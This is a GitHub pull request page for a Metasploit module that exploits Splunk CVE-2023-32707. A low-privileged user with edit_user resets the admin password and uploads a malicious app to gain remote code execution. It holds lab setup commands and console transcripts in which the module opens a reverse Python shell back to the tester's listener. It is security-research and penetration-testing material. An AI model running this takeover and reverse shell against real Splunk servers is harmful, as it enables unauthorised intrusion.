Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Splunk account take over (CVE-2023-32707) leading to RCE #18348

Merged
merged 14 commits into from
Oct 26, 2023
Merged

Splunk account take over (CVE-2023-32707) leading to RCE #18348

merged 14 commits into from
Oct 26, 2023

Conversation

heyder
Copy link
Contributor

@heyder heyder commented Sep 7, 2023
edited
Loading

This module exploits an authorization vulnerability in Splunk (CVE-2023-32707), allowing a lower privileged user with the capability edit_user to take over the admin account and log in to upload a malicious app, achieving remote code execution.

Closes #18061

Vulnerable Application

Create a Splunk's docker container with the following command:

    docker run --rm -p 8000:8000 -p 8089:8089 -e "SPLUNK_START_ARGS=--accept-license" -e "SPLUNK_PASSWORD=password" --name splunk-9.0.4 splunk/splunk:9.0.4
    # Creating non-admin user
    $ curl -k -u admin:password https://localhost:8089/services/authentication/users -d name=redway -d password=changeme -d roles=user -d createrole=1 -X POST
    # Adding capability to edit_user to the non-admin role
    $ curl -k -u admin:password https://localhost:8089/services/authorization/roles/user-redway -d capabilities=edit_user -X POST

Scenarios

Docker container running Splunk 9.0.4

If the user you have access doen't have the capability edit_user the module will fail as shown below:

msf6 exploit(multi/http/splunk_privilege_escalation_cve_2023_32707) > check
[*] Splunk version 9.0.4 detected
[*] 127.0.0.1:8000 - The target is not exploitable. User 'redway' does not have 'edit_user' capability
msf6 exploit(multi/http/splunk_privilege_escalation_cve_2023_32707) >

If the targeted user does have the capability install_apps the module will fail as shown below:

msf6 exploit(multi/http/splunk_privilege_escalation_cve_2023_32707) > exploit
[*] Started reverse TCP handler on 172.17.0.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Splunk version 9.0.4 detected
[+] The target appears to be vulnerable. User 'redway' has 'edit_user' capability
[*] Changing 'user' password to yMDIOKyrHoUx
[+] Password of the user 'user' has bee changed to yMDIOKyrHoUx
[-] Exploit aborted due to failure: bad-config: The user 'user' does not have 'install_app' capability. You may consider to target other user
[*] Exploit completed, but no session was created.
msf6 exploit(multi/http/splunk_privilege_escalation_cve_2023_32707) >

In an exploitable scenario, it behaves as shown:

msf6 exploit(multi/http/splunk_privilege_escalation_cve_2023_32707) > options
Module options (exploit/multi/http/splunk_privilege_escalation_cve_2023_32707):
   Name             Current Setting      Required  Description
   ----             ---------------      --------  -----------
   APP_NAME                              no        The name of the app to upload (default: random)
   PASSWORD         changeme             yes       The password for the specified username
   Proxies          http:127.0.0.1:8080  no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS           127.0.0.1            yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT            8000                 yes       The target port (TCP)
   SSL              false                no        Negotiate SSL/TLS for outgoing connections
   TARGET_PASSWORD                       no        The new password to set for the admin user (default: random)
   TARGET_USER      admin                yes       The username to change the password for (default: admin)
   USERNAME         redway               yes       The username with "edit_user" role to authenticate as
   VHOST                                 no        HTTP server virtual host
Payload options (cmd/unix/reverse_python):
   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.17.0.1       yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port
   SHELL  /bin/sh          yes       The system shell to use
Exploit target:
   Id  Name
   --  ----
   0   Splunk <= 9.0.5, 8.2.11, and 8.1.14 / Linux
View the full module info with the info, or info -d command.
msf6 exploit(multi/http/splunk_privilege_escalation_cve_2023_32707) > exploit
[*] Started reverse TCP handler on 172.17.0.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Splunk version 9.0.4 detected
[+] The target appears to be vulnerable. User 'redway' has 'edit_user' capability
[*] Changing 'admin' password to srviInIpi
[+] Password of the user 'admin' has bee changed to srviInIpi
[*] Uploading app stringtough
[*] Uploading file stringtough
[*] Creating an application package named: stringtough
[+] stringtough successfully uploaded
[*] Waiting for session
[*] Command shell session 1 opened (172.17.0.1:4444 -> 172.17.0.2:52672) at 2023-09-12 15:19:53 +0200
id
uid=41812(splunk) gid=41812(splunk) groups=41812(splunk),999(ansible)
pwd
/opt/splunk/etc/apps/stringtough/bin
exit
[*] 127.0.0.1 - Command shell session 1 closed.

Docker container running Splunk 9.0.5

On a non-vulnerable version the module will fail as shown below:

msf6 exploit(multi/http/splunk_privilege_escalation_cve_2023_32707) > exploit 
[*] Started reverse TCP handler on 172.17.0.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The target is not exploitable. Detected Splunk version 9.0.5 which is not vulnerable ForceExploit is enabled, proceeding with exploitation.
[*] Changing 'admin' password to iDKBmVsj
[-] Exploit aborted due to failure: unexpected-reply: Unable to change admin's password.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/http/splunk_privilege_escalation_cve_2023_32707) > set ForceExploit true
ForceExploit => true
msf6 exploit(multi/http/splunk_privilege_escalation_cve_2023_32707) > exploit 
[*] Started reverse TCP handler on 172.17.0.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The target is not exploitable. Detected Splunk version 9.0.5 which is not vulnerable ForceExploit is enabled, proceeding with exploitation.
[*] Changing 'admin' password to scupUXtcV
[-] Exploit aborted due to failure: unexpected-reply: Unable to change admin's password.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/http/splunk_privilege_escalation_cve_2023_32707) >

@bcoles bcoles added the module label Sep 7, 2023
adfoster-r7
adfoster-r7 reviewed Sep 14, 2023
View reviewed changes
documentation/modules/exploit/multi/http/splunk_privilege_escalation_cve_2023_32707.md Outdated Show resolved Hide resolved
modules/exploits/multi/http/splunk_privilege_escalation_cve_2023_32707.rb Outdated Show resolved Hide resolved
modules/exploits/multi/http/splunk_privilege_escalation_cve_2023_32707.rb Outdated Show resolved Hide resolved
modules/exploits/multi/http/splunk_privilege_escalation_cve_2023_32707.rb Outdated Show resolved Hide resolved
modules/exploits/multi/http/splunk_privilege_escalation_cve_2023_32707.rb Outdated Show resolved Hide resolved
modules/exploits/multi/http/splunk_privilege_escalation_cve_2023_32707.rb Outdated Show resolved Hide resolved
modules/exploits/multi/http/splunk_privilege_escalation_cve_2023_32707.rb Outdated Show resolved Hide resolved
modules/exploits/multi/http/splunk_privilege_escalation_cve_2023_32707.rb Outdated Show resolved Hide resolved
modules/exploits/multi/http/splunk_privilege_escalation_cve_2023_32707.rb Show resolved Hide resolved
modules/exploits/multi/http/splunk_privilege_escalation_cve_2023_32707.rb Outdated Show resolved Hide resolved
@heyder heyder changed the title Placeholder for CVE-2023-32707 Splunk account take over (CVE-2023-32707) leading to RCE Sep 15, 2023
@heyder heyder marked this pull request as ready for review September 15, 2023 15:08
@adfoster-r7 adfoster-r7 self-assigned this Sep 18, 2023
eu added 3 commits September 22, 2023 11:52
Remove ReturnOutput option
47d8e4d 
TODO: distinguish commands that return output and commands that don't
Improve the cleanup method
4044835 
- The cleanup methos is deleting the job and removing the app directory
- Added a change dir command as an AutoRunScript just to avoid the error when trying to access the current directory in the session
Fix code styling
b1de44d
@zgoldman-r7 zgoldman-r7 added the rn-modules release notes for new or majorly enhanced modules label Oct 19, 2023
@zgoldman-r7 zgoldman-r7 merged commit d960aa5 into rapid7:master Oct 26, 2023
32 checks passed
@zgoldman-r7
Copy link
Contributor

Release Notes

This module exploits an authorization vulnerability in Splunk, targeting CVE-2023-32707, allowing a lower privileged user with the capability edit_user to take over the admin account and log in to upload a malicious app, achieving remote code execution.

@heyder heyder deleted the mod/splunk_cve_2023_32707 branch October 26, 2023 16:19
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@zgoldman-r7 zgoldman-r7 zgoldman-r7 left review comments

@cgranleese-r7 cgranleese-r7 cgranleese-r7 left review comments

@adfoster-r7 adfoster-r7 adfoster-r7 left review comments

Assignees

@zgoldman-r7 zgoldman-r7

Labels
module rn-modules release notes for new or majorly enhanced modules
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

Splunk Privilege Escalation (CVE-2023-32707)
5 participants
@heyder @zgoldman-r7 @adfoster-r7 @cgranleese-r7 @bcoles